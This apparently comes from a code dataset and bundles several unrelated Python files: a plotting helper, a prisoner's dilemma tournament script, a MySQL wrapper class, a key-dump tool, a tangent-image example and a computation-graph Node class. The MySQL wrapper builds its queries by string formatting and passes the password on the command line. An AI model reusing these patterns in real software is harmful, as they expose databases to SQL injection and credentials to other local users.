"""
# fmt: off
fig0 = self.plot_magnitude(probe, percentile, conf_interval, units=units, **kwargs)
fig1 = self.plot_phase(probe, percentile, conf_interval, **kwargs)
fig2 = self.plot_polar_bode(probe, percentile, conf_interval, units=units, **kwargs)
if fig is None:
fig = make_subplots(
rows=2, cols=2, specs=[[{}, {"type": "polar", "rowspan": 2}], [{}, None]]
)
# fmt: on
for data in fig0["data"]:
data.showlegend = False
fig.add_trace(data, row=1, col=1)
for data in fig1["data"]:
data.showlegend = False
fig.add_trace(data, row=2, col=1)
for data in fig2["data"]:
fig.add_trace(data, row=1, col=2)
fig.update_xaxes(fig0.layout.xaxis, row=1, col=1)
fig.update_yaxes(fig0.layout.yaxis, row=1, col=1)
fig.update_xaxes(fig1.layout.xaxis, row=2, col=1)
fig.update_yaxes(fig1.layout.yaxis, row=2, col=1)
fig.update_layout(
polar=dict(
radialaxis=fig2.layout.polar.radialaxis,
angularaxis=fig2.layout.polar.angularaxis,
),
)
return fig
| 2.203125 | 2 |
code/prisonersDilemma.py | ben9583/PrisonersDilemmaTournament | 1 | 3470 | import os
import itertools
import importlib
import numpy as np
import random
STRATEGY_FOLDER = "exampleStrats"
RESULTS_FILE = "results.txt"
pointsArray = [[1,5],[0,3]] # The i-j-th element of this array is how many points you receive if you do play i, and your opponent does play j.
moveLabels = ["D","C"]
# D = defect, betray, sabotage, free-ride, etc.
# C = cooperate, stay silent, comply, upload files, etc.
# Returns a 2-by-n numpy array. The first axis is which player (0 = us, 1 = opponent)
# The second axis is which turn. (0 = first turn, 1 = next turn, etc.
# For example, it might return
#
# [[0 0 1] a.k.a. D D C
# [1 1 1]] a.k.a. C C C
#
# if there have been 3 turns, and we have defected twice then cooperated once,
# and our opponent has cooperated all three times.
def getVisibleHistory(history, player, turn):
historySoFar = history[:,:turn].copy()
if player == 1:
historySoFar = np.flip(historySoFar,0)
return historySoFar
def runRound(pair):
moduleA = importlib.import_module(STRATEGY_FOLDER+"."+pair[0])
moduleB = importlib.import_module(STRATEGY_FOLDER+"."+pair[1])
memoryA = None
memoryB = None
LENGTH_OF_GAME = int(200-40*np.log(random.random())) # The games are a minimum of 50 turns long. The np.log here guarantees that every turn after the 50th has an equal (low) chance of being the final turn.
history = np.zeros((2,LENGTH_OF_GAME),dtype=int)
for turn in range(LENGTH_OF_GAME):
playerAmove, memoryA = moduleA.strategy(getVisibleHistory(history,0,turn),memoryA)
playerBmove, memoryB = moduleB.strategy(getVisibleHistory(history,1,turn),memoryB)
history[0,turn] = playerAmove
history[1,turn] = playerBmove
return history
def tallyRoundScores(history):
scoreA = 0
scoreB = 0
ROUND_LENGTH = history.shape[1]
for turn in range(ROUND_LENGTH):
playerAmove = history[0,turn]
playerBmove = history[1,turn]
scoreA += pointsArray[playerAmove][playerBmove]
scoreB += pointsArray[playerBmove][playerAmove]
return scoreA/ROUND_LENGTH, scoreB/ROUND_LENGTH
def outputRoundResults(f, pair, roundHistory, scoresA, scoresB):
f.write(pair[0]+" (P1) VS. "+pair[1]+" (P2)\n")
for p in range(2):
for t in range(roundHistory.shape[1]):
move = roundHistory[p,t]
f.write(moveLabels[move]+" ")
f.write("\n")
f.write("Final score for "+pair[0]+": "+str(scoresA)+"\n")
f.write("Final score for "+pair[1]+": "+str(scoresB)+"\n")
f.write("\n")
def pad(stri, leng):
result = stri
for i in range(len(stri),leng):
result = result+" "
return result
def runFullPairingTournament(inFolder, outFile):
print("Starting tournament, reading files from "+inFolder)
scoreKeeper = {}
STRATEGY_LIST = []
for file in os.listdir(inFolder):
if file.endswith(".py"):
STRATEGY_LIST.append(file[:-3])
for strategy in STRATEGY_LIST:
scoreKeeper[strategy] = 0
f = open(outFile,"w+")
for pair in itertools.combinations(STRATEGY_LIST, r=2):
roundHistory = runRound(pair)
scoresA, scoresB = tallyRoundScores(roundHistory)
outputRoundResults(f, pair, roundHistory, scoresA, scoresB)
scoreKeeper[pair[0]] += scoresA
scoreKeeper[pair[1]] += scoresB
scoresNumpy = np.zeros(len(scoreKeeper))
for i in range(len(STRATEGY_LIST)):
scoresNumpy[i] = scoreKeeper[STRATEGY_LIST[i]]
rankings = np.argsort(scoresNumpy)
f.write("\n\nTOTAL SCORES\n")
for rank in range(len(STRATEGY_LIST)):
i = rankings[-1-rank]
score = scoresNumpy[i]
scorePer = score/(len(STRATEGY_LIST)-1)
f.write("#"+str(rank+1)+": "+pad(STRATEGY_LIST[i]+":",16)+' %.3f'%score+' (%.3f'%scorePer+" average)\n")
f.flush()
f.close()
print("Done with everything! Results file written to "+RESULTS_FILE)
runFullPairingTournament(STRATEGY_FOLDER, RESULTS_FILE)
| 3.75 | 4 |
json_to_relation/mysqldb.py | paepcke/json_to_relation | 4 | 3471 | # Copyright (c) 2014, Stanford University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Created on Sep 24, 2013
@author: paepcke
Modifications:
- Dec 30, 2013: Added closing of connection to close() method
'''
import re
import subprocess
import tempfile
import pymysql
#import MySQLdb
class MySQLDB(object):
'''
Shallow interface to MySQL databases. Some niceties nonetheless.
The query() method is an iterator. So::
for result in mySqlObj.query('SELECT * FROM foo'):
print result
'''
def __init__(self, host='127.0.0.1', port=3306, user='root', passwd='', db='mysql'):
'''
:param host: MySQL host
:type host: string
:param port: MySQL host's port
:type port: int
:param user: user to log in as
:type user: string
:param passwd: password to use for given user
:type passwd: string
:param db: database to connect to within server
:type db: string
'''
# If all arguments are set to None, we are unittesting:
if all(arg is None for arg in (host,port,user,passwd,db)):
return
self.user = user
self.pwd = <PASSWORD>
self.db = db
self.cursors = []
try:
self.connection = pymysql.connect(host=host, port=port, user=user, passwd=<PASSWORD>, db=db)
#self.connection = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd, db=db, local_infile=1)
#except MySQLdb.OperationalError:
except pymysql.OperationalError:
pwd = '...............' if len(passwd) > 0 else '<no password>'
raise ValueError('Cannot reach MySQL server with host:%s, port:%s, user:%s, pwd:%s, db:%s' %
(host, port, user, pwd, db))
def close(self):
'''
Close all cursors that are currently still open.
'''
for cursor in self.cursors:
try:
cursor.close()
except:
pass
try:
self.connection.close()
except:
pass
def createTable(self, tableName, schema):
'''
Create new table, given its name, and schema.
The schema is a dict mappingt column names to
column types. Example: {'col1' : 'INT', 'col2' : 'TEXT'}
:param tableName: name of new table
:type tableName: String
:param schema: dictionary mapping column names to column types
:type schema: Dict<String,String>
'''
colSpec = ''
for colName, colVal in schema.items():
colSpec += str(colName) + ' ' + str(colVal) + ','
cmd = 'CREATE TABLE IF NOT EXISTS %s (%s) ' % (tableName, colSpec[:-1])
cursor = self.connection.cursor()
try:
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def dropTable(self, tableName):
'''
Delete table safely. No errors
:param tableName: name of table
:type tableName: String
'''
cursor = self.connection.cursor()
try:
cursor.execute('DROP TABLE IF EXISTS %s' % tableName)
self.connection.commit()
finally:
cursor.close()
def truncateTable(self, tableName):
'''
Delete all table rows. No errors
:param tableName: name of table
:type tableName: String
'''
cursor = self.connection.cursor()
try:
cursor.execute('TRUNCATE TABLE %s' % tableName)
self.connection.commit()
finally:
cursor.close()
def insert(self, tblName, colnameValueDict):
'''
Given a dictionary mapping column names to column values,
insert the data into a specified table
:param tblName: name of table to insert into
:type tblName: String
:param colnameValueDict: mapping of column name to column value
:type colnameValueDict: Dict<String,Any>
'''
colNames, colValues = zip(*colnameValueDict.items())
cursor = self.connection.cursor()
try:
cmd = 'INSERT INTO %s (%s) VALUES (%s)' % (str(tblName), ','.join(colNames), self.ensureSQLTyping(colValues))
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def bulkInsert(self, tblName, colNameTuple, valueTupleArray):
'''
Inserts large number of rows into given table. Strategy: write
the values to a temp file, then generate a LOAD INFILE LOCAL
MySQL command. Execute that command via subprocess.call().
Using a cursor.execute() fails with error 'LOAD DATA LOCAL
is not supported in this MySQL version...' even though MySQL
is set up to allow the op (load-infile=1 for both mysql and
mysqld in my.cnf).
:param tblName: table into which to insert
:type tblName: string
:param colNameTuple: tuple containing column names in proper order, i.e. \
corresponding to valueTupleArray orders.
:type colNameTuple: (str[,str[...]])
:param valueTupleArray: array of n-tuples, which hold the values. Order of\
values must corresond to order of column names in colNameTuple.
:type valueTupleArray: [(<anyMySQLCompatibleTypes>[<anyMySQLCompatibleTypes,...]])
'''
tmpCSVFile = tempfile.NamedTemporaryFile(dir='/tmp',prefix='userCountryTmp',suffix='.csv')
for valueTuple in valueTupleArray:
tmpCSVFile.write(','.join(valueTuple) + '\n')
try:
# Remove quotes from the values inside the colNameTuple's:
mySQLColNameList = re.sub("'","",str(colNameTuple))
mySQLCmd = "USE %s; LOAD DATA LOCAL INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\"' LINES TERMINATED BY '\\n' %s" %\
(self.db, tmpCSVFile.name, tblName, mySQLColNameList)
subprocess.call(['mysql', '-u', self.user, '-p%s'%self.pwd, '-e', mySQLCmd])
finally:
tmpCSVFile.close()
def update(self, tblName, colName, newVal, fromCondition=None):
'''
Update one column with a new value.
:param tblName: name of table in which update is to occur
:type tblName: String
:param colName: column whose value is to be changed
:type colName: String
:param newVal: value acceptable to MySQL for the given column
:type newVal: type acceptable to MySQL for the given column
:param fromCondition: optionally condition that selects which rows to update.\
if None, the named column in all rows are updated to\
the given value. Syntax must conform to what may be in\
a MySQL FROM clause (don't include the 'FROM' keyword)
:type fromCondition: String
'''
cursor = self.connection.cursor()
try:
if fromCondition is None:
cmd = "UPDATE %s SET %s = '%s';" % (tblName,colName,newVal)
else:
cmd = "UPDATE %s SET %s = '%s' WHERE %s;" % (tblName,colName,newVal,fromCondition)
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def ensureSQLTyping(self, colVals):
'''
Given a list of items, return a string that preserves
MySQL typing. Example: (10, 'My Poem') ---> '10, "My Poem"'
Note that ','.join(map(str,myList)) won't work:
(10, 'My Poem') ---> '10, My Poem'
:param colVals: list of column values destined for a MySQL table
:type colVals: <any>
'''
resList = []
for el in colVals:
if isinstance(el, basestring):
resList.append('"%s"' % el)
else:
resList.append(el)
return ','.join(map(str,resList))
def query(self, queryStr):
'''
Query iterator. Given a query, return one result for each
subsequent call.
:param queryStr: query
:type queryStr: String
'''
cursor = self.connection.cursor()
# For if caller never exhausts the results by repeated calls:
self.cursors.append(cursor)
cursor.execute(queryStr)
while True:
nextRes = cursor.fetchone()
if nextRes is None:
cursor.close()
return
yield nextRes
| 1.625 | 2 |
tools/xkeydump.py | treys/crypto-key-derivation | 29 | 3472 | <reponame>treys/crypto-key-derivation
#!./venv/bin/python
from lib.mbp32 import XKey
from lib.utils import one_line_from_stdin
xkey = XKey.from_xkey(one_line_from_stdin())
print(xkey)
print("Version:", xkey.version)
print("Depth:", xkey.depth)
print("Parent FP:", xkey.parent_fp.hex())
print("Child number:", xkey.child_number_with_tick())
print("Chain code:", xkey.chain_code.hex())
print("Key:", xkey.key)
if xkey.key.get_private_bytes():
print("Private bytes:", xkey.key.get_private_bytes().hex())
print("Public bytes:", xkey.key.get_public_bytes().hex())
print("Key ID:", xkey.keyid().hex())
print("XKey:", xkey.to_xkey().decode('ascii'))
| 2.21875 | 2 |
examples/compute_angular_resolution.py | meder411/Tangent-Images | 57 | 3473 | from spherical_distortion.util import *
sample_order = 9 # Input resolution to examine
def ang_fov(s):
print('Spherical Resolution:', s)
for b in range(s):
dim = tangent_image_dim(b, s) # Pixel dimension of tangent image
corners = tangent_image_corners(b, s) # Corners of each tangent image
fov_x, fov_y = compute_tangent_image_angular_resolution(corners)
print(' At base level', b)
print(' FOV (x) =', fov_x)
print(' FOV (y) =', fov_y)
print(' deg/pix (x) =', fov_x/dim)
print(' deg/pix (y) =', fov_y/dim)
ang_fov(sample_order) | 2.984375 | 3 |
polymath/srdfg/base.py | he-actlab/polymath | 15 | 3474 |
from polymath import UNSET_SHAPE, DEFAULT_SHAPES
import builtins
import operator
from collections import OrderedDict, Mapping, Sequence, deque
import functools
from numbers import Integral, Rational, Real
import contextlib
import traceback
import uuid
import numpy as np
import importlib
from .graph import Graph
from .domain import Domain
from .util import _noop_callback, _flatten_iterable, node_hash, \
_is_node_type_instance, is_iterable
class Node(object):
"""
Base class for nodes.
Parameters
----------
args : tuple
Positional arguments passed to the `_evaluate` method.
name : str or None
Name of the node or `None` to use a random, unique identifier.
shape : tuple or None
Shape of the output for a node. This can be a tuple of integers or parameter node names.
graph : Node or None
Parent graph of this node. If graph is `None`, this is the top-level graph.
op_name : str
Operation name which describes the node functionality.
value : Any or None
If a node has a default value to use for execution, it can be set using `value`.
kwargs : dict
Keyword arguments passed to the `_evaluate` method.
"""
_graph_stack = deque([None])
_eval_stack = []
stack_size = 5
evaluated_nodes = 0
def __init__(self, *args,
name=None,
shape=None,
graph=None,
dependencies=None,
op_name=None,
value=None,
**kwargs):
self.nodes = Graph()
self.value = value
self.dependencies = []
self._args = []
self._predeecessors = []
self._succesors = []
self.args = args
if "name" in kwargs:
kwargs.pop("name")
self.added_attrs = []
# TODO: CHange this to underscore private variable
self.kwargs = kwargs
self.graph = graph
self._shape = OrderedDict()
self.shape = shape or tuple([])
# Get a list of all dependencies relevant to this node
self.dependencies = [] if dependencies is None else dependencies
if self.graph:
self.dependencies.extend(self.graph.dependencies)
# Choose a name for the node and add the node to the graph
self._name = None
self.name = name or uuid.uuid4().hex
self._op_name = None
self.op_name = op_name
# Get the stack context so we can report where the node was defined
self._stack = traceback.extract_stack(limit=1)
@property
def graph(self):
"""
polymath.srdfg.graph.Graph : Parent graph of this node. If graph is `None`, this is the top-level graph.
"""
return self._graph
def preds(self):
return self._preds
def succs(self):
return self._preds
def add_predecessor(self, pred):
if isinstance(pred, Node):
self._predecessors.append(pred.gname)
else:
self._predecessors.append(pred)
def add_successor(self, succ):
if isinstance(succ, Node):
self._succesors.append(succ.gname)
else:
self._succesors.append(succ)
def set_edges(self):
for e in self.args:
self.add_predecessor(e)
if isinstance(e, Node):
e.add_successor(self)
@property
def domain(self):
return Domain(tuple([]))
@property
def args(self):
"""
tuple : Positional arguments which are used for executing this node.
"""
return tuple(self._args)
@property
def argnames(self):
return [a.name if isinstance(a, Node) else a for a in self.args]
@property
def shape(self):
"""
tuple : Shape of the output for a node. This can be a tuple of integers or parameter node names.
"""
return self._shape
@property
def var(self):
return self
@property
def name(self):
"""str : Unique name of the node"""
return self._name
@property
def op_name(self):
"""
str : Operation name which describes the node functionality.
"""
return self._op_name
@op_name.setter
def op_name(self, op_name):
if op_name:
self._op_name = op_name
elif self.__class__.__name__ == "Node":
self._op_name = self.name
else:
self._op_name = self.__class__.__name__
@name.setter
def name(self, name):
self.set_name(name)
@args.setter
def args(self, args):
new_args = []
for arg in args:
if isinstance(arg, Node):
if self.__class__.__name__ == "Node":
self.nodes[arg.name] = self.graph[arg.name]
new_args.append(arg)
self._args = tuple(new_args)
@shape.setter
def shape(self, shape):
self.set_shape(shape, init=True)
@graph.setter
def graph(self, graph):
self._graph = Node.get_active_graph(graph)
@property
def gname(self):
scope_names = [self.name]
cgraph = self.graph
while cgraph:
scope_names.append(cgraph.name)
cgraph = cgraph.graph
return "/".join(list(reversed(scope_names)))
def __enter__(self):
Node._graph_stack.append(self)
return self
def __exit__(self, *args):
assert self == Node._graph_stack.pop()
def __repr__(self):
return "<node '%s'>" % self.name
def add_attribute(self, key, value):
self.added_attrs.append(key)
self.kwargs[key] = value
def is_shape_finalized(self):
if self.shape == UNSET_SHAPE:
return False
for s in self.shape:
if not isinstance(s, Integral):
return False
return True
def set_shape(self, shape=None, init=False):
if isinstance(shape, float):
self._shape = tuple([np.int(shape)])
elif isinstance(shape, Integral):
self._shape = tuple([shape])
elif isinstance(shape, Node):
self._shape = tuple([shape])
elif not shape or len(shape) == 0:
# TODO: Change in order to enable "is shape finalized" to work
self._shape = UNSET_SHAPE
else:
shapes = []
for dim in shape:
if isinstance(dim, (Node, Integral)):
shapes.append(dim)
elif isinstance(dim, float):
shapes.append(int(dim))
else:
raise TypeError(f"Shape value must be placeholder or integer value for {self.name}\n"
f"\tDim: {dim}"
f"\n\t{self.kwargs} ")
self._shape = tuple(shapes)
@staticmethod
def get_active_graph(graph=None):
"""
Obtain the currently active graph instance by returning the explicitly given graph or using
the default graph.
Parameters
----------
graph : Node or None
Graph to return or `None` to use the default graph.
Raises
------
ValueError
If no `Graph` instance can be obtained.
"""
graph = graph or Node._graph_stack[-1]
return graph
def instantiate_node(self, node): # pylint:disable=W0621
"""
Instantiate nodes by retrieving the node object associated with the node name.
Parameters
----------
node : Node or str
Node instance or name of an node.
Returns
-------
instantiated_node : Node
Node instance.
Raises
------
ValueError
If `node` is not an `Node` instance or an node name.
RuntimeError
If `node` is an `Node` instance but does not belong to this graph.
"""
if isinstance(node, str):
return self.nodes[node]
if isinstance(node, Node):
if node.name not in self.nodes and (node.graph != self):
raise RuntimeError(f"node '{node}' does not belong to {self} graph, instead belongs to"
f" {node.graph}")
return node
raise ValueError(f"'{node}' is not an `Node` instance or node name")
def instantiate_graph(self, context, **kwargs):
"""
Instantiate a graph by replacing all node names with node instances.
.. note::
This function modifies the context in place. Use :code:`context=context.copy()` to avoid
the context being modified.
Parameters
----------
context : dict[Node or str, object]
Context whose keys are node instances or names.
kwargs : dict[str, object]
Additional context information keyed by variable name.
Returns
-------
normalized_context : dict[Node, object]
Normalized context whose keys are node instances.
Raises
------
ValueError
If the context specifies more than one value for any node.
ValueError
If `context` is not a mapping.
"""
if context is None:
context = {}
elif not isinstance(context, Mapping):
raise ValueError("`context` must be a mapping.")
nodes = list(context)
# Add the keyword arguments
for node in nodes: # pylint:disable=W0621
value = context.pop(node)
node = self.instantiate_node(node)
if node in context:
raise ValueError(f"duplicate unequal value for node '{node}'")
context[node] = value
if node.op_name in ["placeholder", "state", "input", "output", "temp"] and not node.is_shape_finalized():
context[node] = node.evaluate(context)
for name, value in kwargs.items():
node = self.nodes[name]
if node in context:
raise ValueError(f"duplicate value for node '{node}'")
context[node] = value
if node.op_name in ["placeholder", "state", "input", "output", "temp"] and not node.is_shape_finalized():
context[node] = node.evaluate(context)
return context
def run(self, fetches, context=None, *, callback=None, **kwargs):
"""
Evaluate one or more nodes given a dictionary of node names with their values.
.. note::
This function modifies the context in place. Use :code:`context=context.copy()` to avoid
the context being modified.
Parameters
----------
fetches : list[str or Node] or str or Node
One or more `Node` instances or names to evaluate.
context : dict or None
Context in which to evaluate the nodes.
callback : callable or None
Callback to be evaluated when an node is evaluated.
kwargs : dict
Additional context information keyed by variable name.
Returns
-------
values : Node or tuple[object]
Output of the nodes given the context.
Raises
------
ValueError
If `fetches` is not an `Node` instance, node name, or a sequence thereof.
"""
if isinstance(fetches, (str, Node)):
fetches = [fetches]
single = True
elif isinstance(fetches, Sequence):
single = False
else:
raise ValueError("`fetches` must be an `Node` instance, node name, or a "
"sequence thereof.")
fetches = [self.instantiate_node(node) for node in fetches]
context = self.instantiate_graph(context, **kwargs)
for c in context:
if c in fetches and c.op_name in ["output", "state", "temp"]:
write_name = "/".join([f"{i}{c.write_count-1}" for i in c.name.split("/")]) if c.write_count > 0 else c.name
fetches[fetches.index(c)] = c.graph.nodes[write_name]
values = [fetch.evaluate_node(fetch, context, callback=callback) for fetch in fetches]
return values[0] if single else tuple(values)
def __getstate__(self):
return self.__dict__
def __setstate__(self, data):
self.__dict__.update(data)
def set_name(self, name):
"""
Set the name of the node and update the graph.
Parameters
----------
value : str
Unique name of the node.
Returns
-------
self : Node
This node.
Raises
------
ValueError
If an node with `value` already exists in the associated graph.
KeyError
If the current name of the node cannot be found in the associated graph.
"""
name = name or uuid.uuid4().hex
# TODO: Need a way to check if the existing node is not equal to the current ndoe as ewll
if self.graph and name in self.graph.nodes:
raise ValueError(f"duplicate name '{name}' in {self.graph.name}:\n\t"
f"Existing: {self.graph.nodes[name].args}\n\t"
f"New: {self.args}")
if self.graph:
graph = self.graph
if self._name and self._name in graph.nodes:
graph.update_graph_key(self._name, name)
else:
graph.nodes[name] = self
self._name = name
return self
def evaluate_dependencies(self, context, callback=None):
"""
Evaluate the dependencies of this node and discard the values.
Parameters
----------
context : dict
Normalised context in which to evaluate the node.
callback : callable or None
Callback to be evaluated when an node is evaluated.
"""
for node in self.dependencies:
node.evaluate(context, callback)
def evaluate(self, context, callback=None):
"""
Evaluate the node given a context.
Parameters
----------
context : dict
Normalised context in which to evaluate the node.
callback : callable or None
Callback to be evaluated when an node is evaluated.
Returns
-------
value : object
Output of the node given the context.
"""
# Evaluate all explicit dependencies first
self.evaluate_dependencies(context, callback)
if self in context:
return context[self]
# Evaluate the parents
partial = functools.partial(self.evaluate_node, context=context, callback=callback)
args = [partial(arg) for arg in self.args]
kwargs = {key: partial(value) for key, value in self.kwargs.items() if key not in self.added_attrs}
# Evaluate the node
callback = callback or _noop_callback
with callback(self, context):
if self.__class__.__name__ == "Node":
context[self] = self.value = self._evaluate(*args, context=context, **kwargs)
else:
context[self] = self.value = self._evaluate(*args, **kwargs)
return self.value
def _evaluate(self, *args, context=None, **kwargs):
"""
Inheriting nodes should implement this function to evaluate the node.
"""
return self(*args, context, **kwargs)
@classmethod
def evaluate_node(cls, node, context, **kwargs):
"""
Evaluate an node or constant given a context.
"""
Node.evaluated_nodes += 1
try:
if isinstance(node, Node):
Node._eval_stack.append(node.name)
return node.evaluate(context, **kwargs)
partial = functools.partial(cls.evaluate_node, context=context, **kwargs)
if isinstance(node, tuple):
return tuple(partial(element) for element in node)
if isinstance(node, list):
return [partial(element) for element in node]
if isinstance(node, dict):
return {partial(key): partial(value) for key, value in node.items()}
if isinstance(node, slice):
return slice(*[partial(getattr(node, attr))
for attr in ['start', 'stop', 'step']])
return node
except Exception as ex: # pragma: no cover
messages = []
interactive = False
if isinstance(node, Node) or not is_iterable(node):
node = [node]
for n in node:
stack = []
if isinstance(n, Node):
for frame in reversed(n._stack): # pylint: disable=protected-access
# Do not capture any internal stack traces
fname = frame.filename
if 'polymath' in fname:
continue
# Stop tracing at the last interactive cell
if interactive and not fname.startswith('<'):
break # pragma: no cover
interactive = fname.startswith('<')
stack.append(frame)
stack = "".join(traceback.format_list(reversed(stack)))
message = "Failed to evaluate node `%s` defined at:\n\n%s" % (n, stack)
messages.append(message)
raise ex from EvaluationError("".join(messages))
@classmethod
def init_from_args(cls, *args,
name=None,
shape=None,
graph=None,
dependencies=None,
op_name=None,
value=None,
**kwargs):
if len(args) == 0:
n = cls(name=name,
shape=shape,
graph=graph,
op_name=op_name,
dependencies=dependencies,
value=value,
**kwargs)
else:
n = cls(*args,
name=name,
shape=shape,
graph=graph,
op_name=op_name,
dependencies=dependencies,
value=value,
**kwargs)
return n
def __bool__(self):
return True
def __hash__(self):
return id(self)
def func_hash(self):
"""
This returns the functional hash of a particular node. The default hash returns an object id, whereas this function
returns a hash of all attributes and subgraphs of a node.
"""
return node_hash(self)
def find_node(self, name):
g = self.graph
while g is not None and name not in g.nodes:
g = g.graph
if name in g.nodes:
return g.nodes[name]
raise RuntimeError(f"Cannot find {name} in graph nodes. Graph: {self.graph}")
def __len__(self):
#TODO: Update this to check for finalzied shape
if self.shape == UNSET_SHAPE:
raise TypeError(f'`shape` must be specified explicitly for nodes {self}')
return self.shape[0]
def __iter__(self):
num = len(self)
for i in range(num):
yield self[i]
def __eq__(self, other):
return hash(self) == hash(other)
def __getattr__(self, name):
return getattr_(self, name, graph=self.graph)
def __getitem__(self, key):
if self.__class__.__name__ != "Node":
if isinstance(key, (slice, Integral)):
return getitem(self, key, graph=self.graph)
else:
if isinstance(key, (list)):
return var_index(self, key, graph=self)
elif isinstance(key, tuple):
return var_index(self, list(key), graph=self)
else:
return var_index(self, [key], graph=self)
else:
return self.nodes[key]
def __add__(self, other):
return add(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__radd__(self)
def __radd__(self, other):
return add(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__add__(self)
def __sub__(self, other):
return sub(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rsub__(self)
def __rsub__(self, other):
return sub(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__sub__(self)
def __pow__(self, other):
return pow_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rpow__(self)
def __rpow__(self, other):
return pow_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rpow__(self)
def __matmul__(self, other):
return matmul(self, other, graph=self.graph)
def __rmatmul__(self, other):
return matmul(other, self, graph=self.graph)
def __mul__(self, other):
return mul(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rmul__(self)
def __rmul__(self, other):
return mul(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__mul__(self)
def __truediv__(self, other):
return truediv(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__truediv__(self)
def __rtruediv__(self, other):
return truediv(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rtruediv__(self)
def __floordiv__(self, other):
return floordiv(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rfloordiv__(self)
def __rfloordiv__(self, other):
return floordiv(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__floordiv__(self)
def __mod__(self, other):
return mod(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rmod__(self)
def __rmod__(self, other):
return mod(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__mod__(self)
def __lshift__(self, other):
return lshift(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rlshift__(self)
def __rlshift__(self, other):
return lshift(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__lshift__(self)
def __rshift__(self, other):
return rshift(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rrshift__(self)
def __rrshift__(self, other):
return rshift(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rshift__(self)
def __and__(self, other):
return and_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rand__(self)
def __rand__(self, other):
return and_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__and__(self)
def __or__(self, other):
return or_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ror__(self)
def __ror__(self, other):
return or_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__or__(self)
def __xor__(self, other):
return xor(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rxor__(self)
def __rxor__(self, other):
return xor(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__xor__(self)
def __lt__(self, other):
return lt(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__gt__(self)
def __le__(self, other):
return le(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ge__(self)
def __ne__(self, other):
return ne(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ne__(self)
def __gt__(self, other):
return gt(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__lt__(self)
def __ge__(self, other):
return ge(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__le__(self)
def __invert__(self):
return inv(self, graph=self.graph)
def __neg__(self):
return neg(self, graph=self.graph)
def __abs__(self):
return abs_(self, graph=self.graph)
def __pos__(self):
return pos(self, graph=self.graph)
def __reversed__(self):
return reversed_(self, graph=self.graph)
def update_graph_key(self, old_key, new_key):
n = list(map(lambda k: (new_key, self.nodes[k]) if k == old_key else (k, self.nodes[k]), self.nodes.keys()))
self.nodes = Graph(n)
def insert_node(self, node, idx):
